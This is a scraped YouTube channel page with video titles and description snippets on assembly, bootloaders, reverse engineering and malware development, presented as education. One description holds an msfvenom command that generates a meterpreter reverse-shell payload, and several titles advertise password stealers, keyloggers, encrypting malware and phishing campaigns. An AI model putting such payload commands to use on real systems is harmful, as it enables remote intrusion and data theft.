screeck
screeck
  • Видео 30
  • Просмотров 178 179
How to use WindowsAPI functions in Assembly
I made a discord server for everyone interested in low level programming and malware.
Check it out:
▶discord.gg/JxB5mA4nQj
What’s up everyone, today I’m gonna show you how to use Windows API functions in assembly. We’ll read from file, alocate memory and then display the file content inside a message box.
vcvars32:
C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build
link.exe:
C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.38.33130\bin\Hostx86\x86
🖤 SUBSCRIBE 🖤
Twitter/X:
_screeck
My github:
▶github.com/screeck/RUclips/
x64dbg:
▶ x64dbg.com/
Nasm:
▶www.nasm.us/
Timestamps:
0:00▶Intro
0:23▶Setup
1:26▶MessageBox
9:55▶Reading from file
24:59▶Outro
"Wind...
Просмотров: 746

Видео

Reverse engineering obfuscation algorithm | Solving Crackmes #2
Просмотров 81214 дней назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Whats up everyone, today we gonna be solving another crackme but just before we start I wanna share with you an idea that I have. Coz if you are wathing this video I assume you wanna learn reverse engineering, just like me. And I think it would be fun to learn togather so I...
OS development 101 - How to make a bootloader part 3 - load kernel.c
Просмотров 3,1 тыс.28 дней назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Whats up everyone, welcome to the third part of bootloader development mini-servies. In todays video we gonna load kernel from memory and setup cross compiler so that you we can use C to program the kernel. If you didnt watch part 1 and 2 definitly do that before continuing...
OS development 101 - How to make a bootloader part 2 - Protected Mode
Просмотров 4,5 тыс.Месяц назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Whats up everyone, welcome to the seccond part of bootloader development mini-series. In todays video we gonna implement Global Descriptor Table and load 32 bit Protected Mode. Make sure you watch part1: ▶ruclips.net/video/E_n0VtGSZQY/видео.html Enjoy! 🖤 SUBSCRIBE 🖤 Twitter...
OS development 101 - How to make a bootloader part 1 - Hello World
Просмотров 57 тыс.Месяц назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Welcome to the first video in my new mini-series about bootloader development. I’m planning to make 3 videos in total (maybe more, we’ll see how it goes). Topics that will be covered in the series: - Real Mode - Protected Mode - BIOS - Global Descriptor Table - CHS - Loadin...
How to write your first malware as a beginner
Просмотров 16 тыс.Месяц назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj ⚠️Ethical concideration - pleas read⚠️ This video is for educational purposes on Some people would say that building malware is unethical and wrong. Well, it all depends. If you wanna fight a tank you need to know how it works, you need to know it’s weakneses. And by buindi...
How does malware detect virtual machines?
Просмотров 10 тыс.2 месяца назад
#malware #windows10 #programming I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj 🔍 Ever wondered how malware detects if it's running in a virtual machine? 🖥️ In this video, I’ll show you a simple yet crucial technique that malware uses to complicate analysis. We’ll dive into the Windows Registry to uncover special keys u...
What are Processes? | Windows Internals
Просмотров 7452 месяца назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Discover the intricacies of Windows processes in this detailed video! We'll explore what a process is, how processes are created, and delve into their internals. Learn about process creation functions like CreateProcess(), the EPROCESS and KPROCESS structures, and how to us...
Automated vulnerability scanning with Nessus in Kali Linux
Просмотров 7482 месяца назад
#hacker #computerscience #tutorial #cybersecurity I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What's up, everyone! In today's video, I'm going to show you how to use Nessus to automatically detect vulnerabilities in your network. This simple tutorial will give you a brief introduction, so you can explore this powerfu...
Understanding Windows PE file format | Windows Internals
Просмотров 7512 месяца назад
#windows #programming #coding #computerscience I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What’s up everyone! 🚀 In today's video, we’re diving deep into the Portable Executable (PE) file format, an essential component of the Windows operating system. Whether you’re a software developer, cybersecurity enthusiast, or ...
Using Windows Services in Malware Development
Просмотров 5572 месяца назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What’s up everyone, I’m gonna show you how Windows Services can be used in Malware development. Be aware that this video is for educational purposes only. Generate payload with this command: msfvenom arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.130 LPORT=...
Reverse engineering with x64dbg tutorial | Solving Crackmes #1
Просмотров 3,7 тыс.3 месяца назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj What’s up everyone, today I’m gonna show you how to reverse engineer a simple crackme using x64dbg . Crackmes are chellenges for reverse engenieers to practice there skills. They can be simple like the one we gonna solve today or very complicated. You can download thiousend...
Start coding in ASSEMBLY (tutorial for beginners)
Просмотров 2 тыс.3 месяца назад
I made a discord server for everyone interested in low level programming and malware. Check it out: ▶discord.gg/JxB5mA4nQj Welcome to my x86 Assembly tutorial! This video is perfect for beginners looking to dive into low-level programming. In this tutorial, we'll cover everything you need to start your journey in assembly language: Setup the Environment: Learn how to set up your development env...
Learning malware analysis on WannaCry (static & dynamic)
Просмотров 5764 месяца назад
Today I’m gonna show you my first time reverse engineering a malware. I decided to record it and here it is. Almost unedited, free-style. Tools used: -floss - PEstudio -ProcMon -Wireshark -RegShot -WannaCry ;) 🖤 SUBSCRIBE 🖤 Twitter/X: ▶ _screeck How to set up malware analysis lab: ▶ruclips.net/video/1Kb6tee2eJI/видео.html Microsoft documentation: ▶learn.microsoft.com/en-us/windows/w...
YOU have to KNOW this Windows API functions
Просмотров 9744 месяца назад
What’s up everyone, I’m gonna show you 10 Windows API functions that will help you start your journey with Malware Analysis and writting code on windows in general. Here are the functions covered in the video: 1. CreateProcess() 2. VirtualAllocEx() 3. WriteProcessMemory() 4. VirtualProtectEx() 5. CreateRemoteThread() 6. RegCreateKeyEx() 7. RegSetValueEx() 8. RegOpenKeyEx() 9. RegQueryValueEx() ...
Payload staging | Malware development
Просмотров 7764 месяца назад
Payload staging | Malware development
How to build a Malware Analysis lab in 2024 (guide)
Просмотров 1,1 тыс.4 месяца назад
How to build a Malware Analysis lab in 2024 (guide)
How to create YOUR own Antivirus software [Python & C] | Part 2
Просмотров 1,5 тыс.5 месяцев назад
How to create YOUR own Antivirus software [Python & C] | Part 2
How to create YOUR own Antivirus software [Python & C] | Part 1
Просмотров 5 тыс.5 месяцев назад
How to create YOUR own Antivirus software [Python & C] | Part 1
How to make a password stealer in C [code in description]
Просмотров 2,2 тыс.5 месяцев назад
How to make a password stealer in C [code in description]
Reverse shell with Thread Hijacking | Malware development
Просмотров 6506 месяцев назад
Reverse shell with Thread Hijacking | Malware development
How to set up a DARK WEB exit node
Просмотров 8226 месяцев назад
How to set up a DARK WEB exit node
How hackers exfiltrate data via DNS
Просмотров 9296 месяцев назад
How hackers exfiltrate data via DNS
This malware will ENCRYPT your files!
Просмотров 1,3 тыс.7 месяцев назад
This malware will ENCRYPT your files!
Executing shellcode in memory | Malware Development
Просмотров 3,8 тыс.8 месяцев назад
Executing shellcode in memory | Malware Development
Dll Injection attack with Keylogger! | Malware Development
Просмотров 4 тыс.9 месяцев назад
Dll Injection attack with Keylogger! | Malware Development
O Data, All Ye Faithful | tryhackme advent of cyber 2023
Просмотров 1,1 тыс.9 месяцев назад
O Data, All Ye Faithful | tryhackme advent of cyber 2023
How to create a phishing campaign with Gophish
Просмотров 50 тыс.9 месяцев назад
How to create a phishing campaign with Gophish
North Korea INSANE cyberattacks | SONY, Bangladesh Bank, FASTCash
Просмотров 33810 месяцев назад
North Korea INSANE cyberattacks | SONY, Bangladesh Bank, FASTCash
Setup a honeypot and catch hackers for FREE | cowrie tutorial
Просмотров 2,7 тыс.10 месяцев назад
Setup a honeypot and catch hackers for FREE | cowrie tutorial